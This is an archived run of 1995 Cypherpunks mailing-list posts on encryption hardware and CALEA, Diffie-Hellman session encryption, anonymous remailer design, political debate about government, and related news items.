Date: Tue, 31 Jan 95 08:41:21 PST
To: cypherpunks@toad.com
Subject: commercial authecation
Message-ID: <9501310840.1.10673@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Some time ago (perhaps even two years back) I seem to remember
discussion here--or in a related area--about a service some former
Bell Labs people were offering.  It was a time stamp/authentication
service which depended in part on publishing of a hash in a paper
of record.  I now find I have need for this service.  Pointers to
this service (by email) would be much appreciated.  Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 31 Jan 95 06:13:58 PST
To: jim@rsa.com
Subject: AT&T and VLSI Encryption device
Message-ID: <33192.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
announce a hardware encryption device for use in lots of
communications devices, including cell phones, PDAs, etc.

Today's Wall Street Journal has a bit more, says that it uses
3-DES and is a market rejection of Clipper. Also contains a quote
from Jim Bidzos of RSA/PKP. But there is little detail. There
was no mention of what PKP technology is used in the hardware.
I assume that AT&T has liscensed DH for session key exchange.
They could be using RSA with the keys embedded in ROM/EEPROM.

Anyone got any technical details?

Thanks
Pat

Pat Farrell      Grad Student                 pfarrell@cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key availble via finger          #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 09:46:20 PST
To: cypherpunks@toad.com
Subject: Re: AT&T and VLSI Encryption device
Message-ID: <v03001106ab541cedd91c@[140.174.229.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 1/31/95, Perry E. Metzger wrote:
>"Pat Farrell" says:
>> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
>> announce a hardware encryption device for use in lots of
>> communications devices, including cell phones, PDAs, etc.
>
>This is the device I posted a newswire article about a couple of weeks
>ago. No details, but it looks cute.

How does this device conform with the legislated requirement that it must
deliver plaintext to the government upon court-approved demand?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Mon, 30 Jan 95 23:56:13 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501302104.AA24274@snark.imsi.com>
Message-ID: <Pine.NEB.3.91.950131094454.21652n-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> > Right - using DH exchange is probably appropriate in situations where
> > there is no pre-established credentials for the party on the other
> > machine.
> 
> D-H also provides perfect forward secrecy, which is a reason to use it
> even if there is already an established set of credentials.

How about public-key signing the D-H exchange?  Public key to eliminate[*]
the man-in-the-middle attack, and D-H for forward secrecy.

* Almost eliminate.  A sufficiently powerful man in the middle could 
  conceivably subvert the public keys.

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 31 Jan 95 10:01:23 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <9501311801.AA25120@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Richard F. Dutcher"

What's your point?  Got a principle that *hasn't* been
used/abused?
..................................................

The original statement I made was in response to Richard Moore, who was 
wondering out loud why someone else on this list was "on the wrong 
side";   I remarked in essence that he likewise is seemingly on that 
side, as cryptography, in its development, is designed to serve the 
purposes of individuals in disproportion to governmental control over it.

I'm not assuming that "privacy and protection from arbitrary power are 
solely libertarian concerns" either.   Yet I don't need to "check out 
the ACLU and Amnesty International ..." to understand the many 
possibilities and dangers.

My remarks were intended to indicate that it isn't necessary to inspect 
the varying degrees of comparative corruption or betterment in any of 
the institutions which these political arguments encourage;  if you 
understand full well the principle involved, or what it is that is 
"wrong", then it shouldn't be too difficult to see the similar 
impropriety wherever it becomes manifest.

     ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Jan 95 07:09:03 PST
To: cypherpunks@toad.com
Subject: NYT on Fermat Proof
Message-ID: <199501311508.KAA20666@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A long article (16k) today on Dr. Andrew Wiles's dramatic, successful
struggle to close the gap in his proof of Fermat's last theorem. 
 
 
For email copy send blank message to <jya@pipeline.com> with subject: 
FERM_hak 
 
 
Here are excerpts: 
 
 
   Fermat's last theorem which has tantalized mathematicians 
   for more than 350 years, has at last been solved, say those 
   who have read the revised but not yet published proof. But 
   the endgame of this furious chase has proved as full of 
   last-minute surprises as a murder mytery. 
 
 
   For Dr. Andrew Wiles of Princeton University, the chief 
   author of the proof, triumph had to be snatched from the 
   jaws of disaster. His first proof, which aroused world-wide 
   attention when announced two years ago, turned out to 
   contain a gap, which Dr. Wiles found he was unable to cross 
   alone. 
 
   *** 
 
   But he went back to the Flach method for one last time. 
   "There was one variant in the original argument that I'd 
   convinced myself wouldn't work but I hadn't convinced him," 
   Dr. Wiles said. "I was sitting at my desk one morning 
   really trying to pin down why the Flach method wasn't 
   working when, in a flash, I saw that what was making it not 
   work was exactly what would make a method I'd tried three 
   years before work. It was totally unexpected. I didn't 
   quite believe it." He dashed down from the attic to tell 
   his wife. Although his enthusiasm was infectious, Dr. Wiles 
   said, " I actually think she didn't believe me." 
 
   *** 
 
   Dr. Wiles said that the breakthrough came in figuring out 
   how to glue together an infinite collection of mathematical 
   objects called Hecke rings. He had initially been creating 
   what was "a very natural relationship between these objects 
   -- natural in the sense that you can give a clear 
   definition of the maps between them." It was an inductive 
   argument. The idea was to take one element of a set and use 
   that to find the next element, then to use the second to 
   construct a third, and so on. 
 
 
   The new idea, Dr. Wiles said, "was to simply construct 
   artificial maps between these objects." 
 
 
   "You wouldn't show a relationship explicitly," he said, but 
   would use a counting argument to prove that a relationship 
   had to exist. The basic idea is to use the pigeonhole 
   principle: if you have more objects than pigeonholes to put 
   them in, then at least one pigeonhole must contain more 
   than one object. 
 
 
   The complete argument involves creating an infinite 
   sequence of sets of pigeonholes and then showing that there 
   must be objects that show up in every set of pigeonholes. 
   This allowed.Dr. Wiles and Dr. Taylor to prove that there 
   must be an infinite set of Hecke rings that share a 
   relationship, although they never have to specify exactly 
   what that relationship is. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 07:22:34 PST
To: pfarrell@netcom.com
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <33192.pfarrell@netcom.com>
Message-ID: <9501311521.AA24977@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Pat Farrell" says:
> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
> announce a hardware encryption device for use in lots of
> communications devices, including cell phones, PDAs, etc.

This is the device I posted a newswire article about a couple of weeks
ago. No details, but it looks cute.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Tue, 31 Jan 95 10:58:48 PST
To: cypherpunks@toad.com
Subject: Z-Mail
Message-ID: <9500317915.AA791578665@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     Can someone please email me with details about obtaining and 
     configuring Z-Mail for use with PGP?
     Thanks,
     John
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 11:02:57 PST
To: perry@imsi.com
Subject: Re: AT&T and VLSI Encryption device
Message-ID: <v03001108ab5431879c3e@[140.174.229.228]>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 1/31/95, Perry E. Metzger wrote:
>Michael Sattler says:
>>
>> How does this device conform with the legislated requirement that it must
>> deliver plaintext to the government upon court-approved demand?
>
>There is no such requirement.

I was under the impression that "the Communications Assistance for Law
Enforcement Act requires equipment manufacturers and telecommunications
carriers to develop network technologies that are readily wiretapped" (from
Garfinkel's book).  Doesn't a "hardware encryption device for use in lots
of communications devices, including cell phones, PDAs, etc." seem to fall
into that category?

If it doesn't then I have no idea what CALEA is supposed to do.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 09:55:32 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <v03001106ab541cedd91c@[140.174.229.210]>
Message-ID: <9501311755.AA25178@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 07:21 1/31/95, Perry E. Metzger wrote:
> >"Pat Farrell" says:
> >> Today's (1/31) Washington Post has a tiny blurb that AT&T and VLSI will
> >> announce a hardware encryption device for use in lots of
> >> communications devices, including cell phones, PDAs, etc.
> >
> >This is the device I posted a newswire article about a couple of weeks
> >ago. No details, but it looks cute.
> 
> How does this device conform with the legislated requirement that it must
> deliver plaintext to the government upon court-approved demand?

There is no such requirement.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 31 Jan 95 13:06:33 PST
To: remailer-operators@c2.org
Subject: Cypherpunks CD-ROM
Message-ID: <199501312102.NAA10622@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I am putting together a CD-ROM covering cryptography, privacy,
remailers, etc.. essentially the whole cypherpunk bit.

	Please send contributions/suggestions/comments/flames to
sameer@c2.org.

	Thanks.
-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 31 Jan 95 10:28:43 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
Message-ID: <m0rZNJT-000E68C@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
>
>>Governments as a whole are seen to be "bad" because they invariably undermine
>the right of the individual to make choices for themselves.
>
>Quite untrue. It's society which provides you with an environment in which
>you have choices. And its government which orders that society. It's
>because government has served you so well, that you have luxury to
>fantasize you don't need it. You're being duped.
  
Government does indeed "order society."  However, "order" does not
equat to liberty, luxury, or to individual freedom.
 
If strong government resulted in liberty and freedom, then the
most intrusive, all-encompassing governments would result in 
its citizens having the most liberty.  Is this the case?  I would
look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
for your answer.
 
Individual liberties do not necessarily result in an "orderly
society."  In fact, an imposed "order" on society, by definition,
must result in limited liberties.
 
Apply this to anonymous remailers, and encrypted personal mail, and you can 
easily see how the government imposing "order" would
result in the end of those activities.

************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Tue, 31 Jan 95 10:56:40 PST
To: cypherpunks@toad.com
Subject: URGENT - MS hack of FFS
Message-ID: <9501311856.AA06222@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could somebody here please give me the reference for the full version of
Micali and Shamir's hack of the Fiat-Shamir family of authentication
schemes. I need it to make sure that what I've put in the class notes for
an IAP course I am teaching is correct. I have the short paper (An
improvement of the Fiat-Shamir Identification and Signature Scheme) from
Crypto '88 (I think), but I need the full version. If anybody here can get
me the reference before the libraries here close tonight, I'd really
appreciate it.

Thanks,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Tue, 31 Jan 95 17:51:00 PST
To: cypherpunks@toad.com
Subject: Re: Z-Mail
Message-ID: <9501311709.aa18334@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


I would be interested also.  How about cc  this list...

>     Can someone please email me with details about obtaining and 
>     configuring Z-Mail for use with PGP?
>     Thanks,
>     John
>     
>John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
>JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
>PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
>35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe
>
>
>
>
>
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 11:11:38 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <v03001108ab5431879c3e@[140.174.229.228]>
Message-ID: <9501311911.AA25266@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 09:55 1/31/95, Perry E. Metzger wrote:
> >Michael Sattler says:
> >>
> >> How does this device conform with the legislated requirement that it must
> >> deliver plaintext to the government upon court-approved demand?
> >
> >There is no such requirement.
> 
> I was under the impression that "the Communications Assistance for Law
> Enforcement Act requires equipment manufacturers and telecommunications
> carriers to develop network technologies that are readily wiretapped" (from
> Garfinkel's book).  Doesn't a "hardware encryption device for use in lots
> of communications devices, including cell phones, PDAs, etc." seem to fall
> into that category?

The manufacturers of switching equipment are supposed to make it easy
to get at individual conversations. Nothing in the act forces
customers to make the contents of the conversations comprehensable.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 31 Jan 95 11:13:44 PST
To: mac5tgm@hibbs.vcu.edu (Greg Morgan)
Subject: Re: Better living through better `procmail'
In-Reply-To: <9501311906.AA27997@hibbs.vcu.edu>
Message-ID: <199501311916.OAA05295@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


In reponse to quite a few people asking,

Procmail can be found at 
ftp.informatik.rwth-aachen.de as pub/packages/procmail/procmail.tar.gz

safe-tcl, which some people prefer, is at
ftp.ics.uci.edu:mrose/safe-tcl/safe-tcl.tar.Z

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Tue, 31 Jan 95 13:53:01 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <9501312152.AA10208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me that the current remailer web suffers a fundamental flaw.
It is simply too static. When a remailer disappears, service is
disrupted and messages are lost. Humans have to statically route their
messages through the web either by hand or using relatively primitive
tools such as the chain script (not to belittle the useful work that has
been done, but it is by no means idiot proof yet). Basically, the
current web of mailers shows nothing of the dynamic nature that has kept
the internet alive and has offered us a decent chance at truly anonymous
communications, nor is it easy to use to its full potential.

Consider a more dynamic web of remailers. I envision remailers that
actively advertise their presence on the web so that all active
remailers are aware of all other active remailers. This advertising is
to have very low latency so that a new mailer can be known to the web
within minutes (I will address the implementation of this later). Thus,
remailers can constantly be appearing and disappearing without impact on
the web as a whole (I refer to this dynamic web of remailers as a
"froth"). Imagine also that remailers are allowed to dynamically perform
the routing functions that are currently done statically offline (for
reasons I will discuss shortly).

Now, given all this, what do we gain? First, consider my situation
(which is what started me on this line of thinking); my company has a
leased 56K internet link. I cannot consume this valuable bandwidth with
a remailer during business hours. However, if remailers could pop up and
announce their presence to the web, I could run a transient remailer for
several hours in the wee hours of the morning when the line use is
minimal.

Another benefit would be the possibility of remailers with no fixed
physical location. A remailer can shift from host machine to host
machine daily, as long as there is a decent mechanism to locate it.

The use of such transient routers implies allowing dynamic routing. If
any given remailer may go down or move at any point, it is impractical
to expect users to keep track of which are up at the moment and create
static routes in the current manner. The only reasonable solution I have
come up with is to allow the remailers themselves to choose routing,
given that they have full knowledge of the current state of the froth.

This also confers additional benefits. It has been pointed out that most
traffic across the web is currently unencrypted. It seems to me that any
such message should be fair game. The remailer should be allowed to
encrypt the message and pick a pseudo-random path through the web,
incorporating transient remailers along the way. This adds greatly to
the encrypted traffic on the net, as well as making sure that the
transient remailers are used. It even provides some degree of privacy to
originally non-encrypted messages.

We could of course still allow users to statically route their messages
through the web, or allow combinations (I want this message routed
through remailers A and B to endpoint C; however, remailers are granted
authority to route this message through a maximum of three additional,
randomly chosen remailers between each step). This has the added
advantage of taking the work of routing messages off the user (unless
they really want it). Think about the proposed extension to MixMaster to
allow separate parts of a multi-part message to be routed separately,
and consider whether you really want to have to do this by hand. I
strongly suspect that most messages are currently routed via boilerplate
scripts, which has to make the job of traffic analysis much easier for
our good friend Eve.

By the way, a brief rant on a related topic; people speak of not
trusting remailers any further than necessary, while I am clearly
suggesting granting more authority and trust to the remailers. This
notion of not assigning trust is simply nonsense. When you send a piece
of mail to a remailer, encrypted or not, you are assigning complete
trust in that remailer to keep you anonymous and not to forward your
mail to the NSA immediately.

This does lead to a related problem, however; if we allow remailers to
pop up at random and join in the froth, how do we know that Deitweiller
won't set up a number of black hole remailers that take your mail and
throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
Fortunately, we already have the PGP web of trust model in place and can
use it to good effect in this case. Remailers should simply not route
mail through any remailer whose public key is not trusted unless
explicitly ordered otherwise. This requires remailer operators to
cooperate to some extent to validate one another's remailer keys, but
does confer the great advantage of portable remailers as mentioned
above; if I run a trusted remailer on one machine, I can move it to
another machine, and as soon as I advertise the new address and the PGP
public key, it is a trusted and useful part of the froth.

While we are advertising a PGP key and internet address, we might as
well incorporate other useful information. For instance, remailers could
advertise their maximum latency. This would allow us to send messages
into the froth with the instructions "Keep this message moving for at
least one hour and at most three hours and then deliver to endpoint C"
and allow remailers to make informed decisions about routing this
message (there are some interesting issues in making routing decisions;
if we can assign a cost to the link between each pair of remailers, do
we want to attempt to optimize the route for least cost? Or stick with
random routing to attempt to hinder traffic analysis?). I'm sure that we
can come up with other useful information to assist routing decisions
(available bandwidth, cost per letter, protocols supported, etc.)

Now, the question of implementing remailer advertising. If there is an
existing internet protocol for advertising entities with sufficiently
low latency, I am not aware of it (my background is in Novell and OS/2,
so I'll happily be corrected!) DNS is the closest model to what I want,
but is excessively tied up in bureaucracy and has horrific propagation
times. Thus, we will have to roll our own.

I can think of two reasonable solutions to this problem. The first is a
central authority model: there exist well known servers that each
remailer has to report into when starting up and shutting down. This
model has obvious benefits (ease of use and implementation, minimal
bandwidth usage) and obvious drawbacks (a single point of failure, or at
best very few, distinctly against the cypherpunk philosophy, requires
high-bandwidth, stable servers (read expensive)).

The second solution involves a broadcast model; each remailer
periodically broadcasts its presence to the entire net (say every T
minutes). Any process wanting a full list of all remailers simply has to
monitor the broadcast channel for T minutes to get at least a good
approximation. The problem here is one of delay (to locate a remailer, I
might have to wait T minutes) and bandwidth choking. Obviously, spamming
the entire internet with UDP packets advertising remailers would earn us
no friends (I'm not even sure that it's technically feasible). What we
need is a net of machines to carry the broadcast messages with numerous
well known access points.

By happy coincidence, there exists just such a network (actually,
several of them) that we can subvert for our twisted purposes. It's
called IRC. We can create a dedicated channel that carries the remailer
broadcast messages (to be honest, I have no real idea how to do this, but
one of the wonderHackers out there surely does? otherwise I might
actually be forced to read the RFCs (oh horror!)). I doubt that any
remailer operator will have trouble finding an IRC host to attach to in
order to monitor the broadcasts.

This is obviously a stopgap solution, but provides a method for
jumpstarting the froth without requiring a froth to advertise the froth.
With regard to the bandwidth concerns, I can't imagine that less
than a hundred remailers generating <1K messages every few minutes
(about ten minutes feels like a good value for T) can bring IRC to its
knees. When we get more than a hundred or so remailers up, we'll worry
about bandwidth!

And to the inherent latency problem of the broadcast model, the easiest
solution is to have well known servers cache the advertising information
for immediate access. Not too coincidentally, these caching servers look
a lot like the central point of authority servers in the first solution.
Thus, we can have both the convenience of a central authority model with
the dependable broadcast model to fall back on if it becomes necessary.
Unsolved problem, by the way: it would obviously be nice to have
human-readable names for remailers (the PGP key becomes the true unique
identifier, but I'd much rather pick "Soda remailer" from a list than
four lines of armored ASCII). How can we guarantee unique names and/or
prevent problems resulting from collisions?

Obviously, this process hasn't reached more than the pipe-dream stage
yet. I am very interested in comments and proposals before I start
trying to create some trial implementations. Be gentle, though - it's my
first time.



--
    Kevin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 31 Jan 95 12:17:19 PST
To: cypherpunks@toad.com
Subject: Economist Article on Ecash
Message-ID: <199501312016.AA13549@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The article from the Nov. 26, 1995 of The Economist "So much for the
cashless society. (Electronic Money)" is available at:

http://www.ios.com/~lroth/clips/emoney.html

The WWW disabled can apply to Al Gore for a subsidy or send me an emailed
request.

DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy6XVYVO4r4sgSPhAQEJTQP/W9VI76LRPHopmk9eT5FPqpjry9L+PSwM
cdbMMCyy4lFWjt+KuS2ca9QCtoxNYT3F7k0RvmI5YwlvbhXYbpiSG999inbZZIv5
vcR3iu5CEGum4yQCW3luWojvlKL8fxsZ6ucnTeAJacxmTlO9uqpg43+2uvzapBBe
q5/YsIGB9Dw=
=jTuA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 31 Jan 95 13:45:15 PST
To: cypherpunks@toad.com
Subject: Economist Article on Ecash
Message-ID: <199501312145.AA06494@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


NO CARRIER



RING



CONNECT 14400



NO CARRIER



RING



CONNECT 9600

 


NO CARRIER



RING



CONNECT 9600

ATH


NO CARRIER



RING



CONNECT 9600



NO CARRIER



RING



CONNECT 14400








NO CARRIER



RING



CONNECT 14400

t}
t}t}t}t}t}












NO CARRIER





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rarachel@prism.poly.edu (Arsen Ray Arachelian)
Date: Tue, 31 Jan 95 13:34:45 PST
To: doumakes@netcom.com (Don Doumakes)
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501270505.VAA13738@netcom16.netcom.com>
Message-ID: <9501312119.AA03964@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text


> Internet, nobody knows you're a quack."  I just see it as something to
> endure, rather than something to applaud.

Not quite.  If the socieities or guilds in question were to wake up to the
threat, they could easily have whatever institution issued certificates of
passing/degrees/etc. and sign them with their keys.   The licensee would
then attach his e-diploma to his .plan file for anyone to finger and verify
the signature.

So, there, on the internet, being a quack and getting away with it doesn't
have to happen. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 31 Jan 95 17:50:32 PST
To: Al Thompson <alt@iquest.net>
Subject: Re: "bad" government
In-Reply-To: <m0rZNJT-000E68C@dorite.use.com>
Message-ID: <Pine.SUN.3.91.950131173836.26397K-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Al Thompson wrote:
>  
> If strong government resulted in liberty and freedom, then the
> most intrusive, all-encompassing governments would result in 
> its citizens having the most liberty.  Is this the case?  I would
> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
> for your answer.
>  
This is an example of reasoning by extremes, which always becomes 
reductio ad absurdum.

Unrestricted individual freedom leads to unrestricted freedom of 
`private' corporations.  Private corporations uncurbed by society's law are 
autarkies: internally totalitarian, externally predatory, as amoral as 
amoebas.

Is this the shape of the future you seek?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 31 Jan 95 17:53:54 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <9501311911.AA25266@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950131175217.26397L-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Perry E. Metzger wrote:
> 
> The manufacturers of switching equipment are supposed to make it easy
> to get at individual conversations. Nothing in the act forces
> customers to make the contents of the conversations comprehensable.
> 
That's a loophole in the law that Congress can plug in a day.  And one of 
these days you can bet they will.

What then?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 31 Jan 95 14:54:27 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501312257.AA09640@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt, why did you choose to implement your own protocol instead of
adding a DH authentication/encryption type to telnet?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 31 Jan 95 18:27:47 PST
To: remailer-operators@c2.org
Subject: CD-ROM [brief addition]
Message-ID: <199502010224.SAA24809@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I forgot to mention that the CD-ROM in development will be
export restricted. It isn't going to be sold outside the united states
and canada.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 31 Jan 95 15:37:57 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501312336.AA11049@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>Matt, why did you choose to implement your own protocol instead of
>adding a DH authentication/encryption type to telnet?
>
>               Marc

I've got one of those, too (it won't be ready for release too soon, 
though - telnet is big and ugly).  An encrypting telnet and telnetd
almost always provide a more appropriate way to do session encryption.
However, there are some situations where ESM is really the only
option.  One is when you can't or don't want to install a daemon
(e.g., for very occasional use).  More importantly, by running within
the session, ESM can provide end-to-end encryption across an untrusted
application-layer firewall (like the one I go through to get
between home and work).

Since part of my motivation for working on these tools comes from 
wanting to use them myself, I'm building the stuff I need the most
first.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 15:46:04 PST
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Economist Article on Ecash
In-Reply-To: <199501312145.AA06494@panix.com>
Message-ID: <199501312345.SAA10848@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> NO CARRIER
> 
> 
> 
> RING
> 
> 
> 
> CONNECT 14400

[ Similar stuff clipped ]

Is this a surreal commentary, or did you have some sort of glitch while
writing the message?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 15:56:02 PST
To: kevin@elvis.wicat.com
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <9501312152.AA10208@toad.com>
Message-ID: <199501312355.SAA11306@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


: From kevin@elvis.wicat.com

Without quoting the entire message, I think I better solution, in terms of
ease to implement as well as conserving bandwidth would be to have a
sophisticated remailer script-language.

For instance, the script language could tell the remailer to check if a
site is on-line (perhaps within certain GMT hours or dates) and use the
next site if not available, or to randomly choose from a list of sites
the active ones, etc.

Maybe even have it work with a data haven? Mail the message to a data haven
and send another message to a remailer chain to pull the message from the
data haven and post the data (not flaws in this: don't want remailers getting
files from people's accounts and posting them to usenet etc.).

Seems like this is a "safer" solution that is more flexible then broadcasting
which remailers are active. Also allows for future add-ons like delays,
file-splitting, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Tue, 31 Jan 95 19:13:11 PST
To: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Subject: Re: cel fraud
In-Reply-To: <Pine.3.05.9501220348.A21277-c100000@prism.poly.edu>
Message-ID: <Pine.A32.3.91c.950131190213.57680H-100000@mead1.u.washington.edu>
